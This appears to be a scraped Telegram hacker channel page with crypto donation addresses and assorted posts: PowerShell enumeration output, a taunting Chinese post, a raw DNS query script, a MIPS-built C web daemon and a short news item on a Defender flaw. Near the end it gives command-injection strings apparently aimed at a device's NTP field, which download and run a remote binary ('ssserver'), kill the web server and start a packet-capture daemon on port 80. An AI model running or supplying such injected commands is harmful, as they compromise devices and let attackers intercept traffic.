bytecat
66 subscribers
4 photos
6 videos
6 files
41 links
USDT Tron:
TV7xutPgpSP1wQWF66ppiazZX7yJ5424JX
LTC: ltc1qfwg0lpv2taaa9z7ek73hwxldsj97zj7duplfrp
Session: 05be77963b5a305065d3a109e00aeaf98e6640e82c1973a92073ec762e8506ae35
The atmosphere in the associated group is sheer chaos.
Download Telegram
https://t.me/SURGEPRO
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
今天,还要特别感谢 Officialwhyte22的这篇推文 x.com/Officialwhyte22/status/2025164814180331798
PS C:\Users\Administrator> whoami
desktop-t5qs5ms\administrator
PS C:\Users\Administrator> get-date2026年2月22日 17:28:49PS C:\Users\Administrator> get-netadapter | select-object name,statname Status LinkSpeed---- ------ ---------
OpenVPN TAP-Windows6 Disconnected 1 Gbps
Ethernet0 Up 1 GbpsPS C:\Users\Administrator> get-netipinterface | sort-object interfa
ily,interfacemetric | select-object -first 6InterfaceAliasias AddressFamily interfacemetric----------------- ------------- ---------------
IPv4 25
IPv4 25
IPv6 25
IPv6 25
IPv4 75
IPv6 75PS C:\Users\Administrator> route print | select-string "0.0.0.0" 0.0.0.0 0.0.0.0 192.168.110.1 192.168.110.4
224.0.0.0 240.0.0.0 在链路上 127.
224.0.0.0 240.0.0.0 在链路上 192.168.1PS C:\Users\Administrator> Get-NetTCPConnection -state Established
localaddress,localport,remoteaddress,remoteport,owningprocesslocaladdress : 192.168.110.47
localport : 1541
remoteaddress : 4.145.79.82
remoteport : 443
owningprocess : 68localaddress : 192.168.110.47
localport : 1941
remoteaddress : 117.21.204.18
remoteport : 443
owningprocess : 2140localaddress : 192.168.110.47
localport : 1943
remoteaddress : 2.23.244.9
remoteport : 443
owningprocess : 2140localaddress : 192.168.110.47
localport : 1939
remoteaddress : 117.21.204.18
remoteport : 443
owningprocess : 2140localaddress : 192.168.110.47
localport : 1937
remoteaddress : 117.21.204.18
remoteport : 443
owningprocess : 2140localaddress : 192.168.110.47
localport : 1938
remoteaddress : 117.21.204.18
remoteport : 443
owningprocess : 2140localaddress : 192.168.110.47
localport : 1947
remoteaddress : 2.23.244.9
remoteport : 443
owningprocess : 2140localaddress : 192.168.110.47
localport : 1954
remoteaddress : 72.247.234.254
remoteport : 80
owningprocess : 2140PS C:\Users\Administrator> get-process -id 4Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessNa------- ------ ----- ----- ------ -- -- ---------
2356 0 140 124 71.30 4 0 System
给中国的朋友:
这就是@grok 认为的金玉良言, 我认为这是幼儿园的把戏, 脚本小子都要笑掉大牙.
你为什么要在简介里说自己是道德黑客?你连黑客的门槛都摸不到, 先学点本事再来炫耀吧. 你那套愚蠢的说辞居然还有9.9万查看, 我一边吃饭一边笑的肚子都疼了, 我女朋友还得拍拍我的背安慰我.
执行几个cmdlet把你牛逼的,就像我永远自由一样,你注定永远平庸.
import socket
def q(d):
e = b'\x12\x34'
"""
A 16 bit identifier assigned by the program
程序分配的16位标识符
that generates any kind of query
This identifier is copied
the corresponding reply and can be used by the requester
to match replies to outstanding queries
RFC1035 section4.1.1
nslookup程序出自Debian软件包bind9-dnsutils
它的可执行文件路径是/usr/bin/nslookup
它的源代码文件路径是/bin/dig/nslookup.c(这是gitlab的路径)
在其中搜索字符串uint16(_t) 只有一个端口变量 所以我跳过了
port = (uint16_t)n
过了一年(度秒如年) 我注意到/usr/lib/x86_64-linux-gnu目录下有libdns-9.20.9-1-Debian.so文件
以及libisc-9.20.9-1-Debian.so文件
它们在gitlab上的路径分别为/lib/dns和/lib/isc/
文件分别为dispatch.c和random.c
在dispatch.c中搜索id 第4个在第98行
dns_messageid_t id;
但它还不是 继续搜索dns_messageid
第4个在第1416行
...
总之我认为它要么是指针idp所指向的值
要么是isc_random16()的返回值
resp->id = ((options & DNS_DISPATCHOPT_FIXEDID) != 0)
? *idp
: (dns_messageid_t)isc_random16()
如上
所以现在我可以在random.c中搜索isc_random16
isc_random16(void) {
isc__random_initialize();
return (uint16_t)next();
}
返回值是uint16_t类型的 而next不与说明
"""
h = b'\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00'
y = b''
for p in d.split('.'):
y += bytes([len(p)])+p.encode('utf-8')
y += b'\x00'
y += b'\x00\x01'
y += b'\x00\x01'
pkt = e + h + y
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(pkt, ('127.0.0.1', 53))
r=s.recvfrom(512)[0]
s.close()
b = r[slice(-4,None)]
return '.'.join(str(x) for x in b)
if __name__ == '__main__':
IP = q('bytecategory.com')
print(f"bytecategory.com\t{IP}")
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
int main() {
int f, d;
struct sockaddr_in v, c;
socklen_t client_len = sizeof(c);
char b[1024];
f = socket(AF_INET, SOCK_STREAM, 0);
int p = 1;
setsockp(f, SOL_SOCKET, SO_REUSEADDR, &p, sizeof(p));
memset(&v, 0, sizeof(v));
v.sin_family = AF_INET;
v.sin_addr.s_addr = INADDR_ANY;
v.sin_port = htons(80);
bind(f, (struct sockaddr *)&v, sizeof(v));
listen(f, 3);
daemon(1, 1);
while (1) {
if ((d = accept(f, (struct sockaddr *)&c, &client_len)) < 0) {
continue;
}
int s = read(d, b, 1024);
if (s < 0) {
close(d);
continue;
}
const char *r = "HTTP/1.1 200 OK\r\n\r\n<p style='text-align: center;color: pink;font-size: 24px'>cyw,&#x6211;&#x559C;&#x6B22;&#x4F60;</p>";
send(d, r, strlen(r), 0);
close(d);
}
close(f);
return 0;
}

mips-linux-gnu-gcc -march=mips2 -EB -mtune=mips2 -mabi=32 -mhard-float -static -O0 -o E E.c
-497714339 To 93[.]123[.]85[.]226
print(
'''\033 //
\\\\ //
\\\\ //
##DDDDDDDDDDDDDDDDDDDDDD##
## DDDDDDDDDDDDDDDDDDDD ## ________ ___ ___ ___ ________ ___ ___ ___
## hh hh ## |\\ __ \\ |\\ \\ |\\ \\ |\\ \\ |\\ __ \\ |\\ \\ |\\ \\ |\\ \\
## hh // \\\\ hh ## \\ \\ \\|\\ /_\\ \\ \\\\ \\ \\ \\ \\ \\\\ \\ \\|\\ /_\\ \\ \\\\ \\ \\ \\ \\ \\
## hh // \\\\ hh ## \\ \\ __ \\\\ \\ \\\\ \\ \\ \\ \\ \\\\ \\ __ \\\\ \\ \\\\ \\ \\ \\ \\ \\
## hh hh ## \\ \\ \\|\\ \\\\ \\ \\\\ \\ \\____ \\ \\ \\\\ \\ \\|\\ \\\\ \\ \\\\ \\ \\____ \\ \\ \\
## hh wwww hh ## \\ \\_______\\\\ \\__\\\\ \\_______\\\\ \\__\\\\ \\_______\\\\ \\__\\\\ \\_______\\\\ \\__\\
## hh hh ## \\|_______| \\|__| \\|_______| \\|__| \\|_______| \\|__| \\|_______| \\|__|
## MMMMMMMMMMMMMMMMMMMM ##
##MMMMMMMMMMMMMMMMMMMMMM##
\\/ \\/
\033''',
end='')
msntp -V -c 1 -r time[.]nist[.]gov&cd /tmp;chmod +x ./ssserver;./ssserver | dd of=.txt > /dev/null
/bin/sh -c ntpd -dnqp time[.]nist[.]gov;cd /zconf;sleep 114514;wget bytecategory[.]com/ssserver > /dev/null
killall uhttpd;rpcapd -p 80 -d
安全研究员在Microsoft Defender中发现漏洞 与微软产生矛盾后公开漏洞(作者:匿名)

研究人员在 Microsoft Defender 中发现安全漏洞,可以借助这款系统级安全软件本身进行权限提升。但研究人员与 MSRC 团队之间出现矛盾,这导致研究人员直接公布漏洞,漏洞公布后已经有黑客开始尝试利用漏洞发起攻击 --- 利用 Defender 作为提权跳板。
需要注意的是 这个安全研究员不是我
新闻: emptiness 作者删除了他的Telegram 账户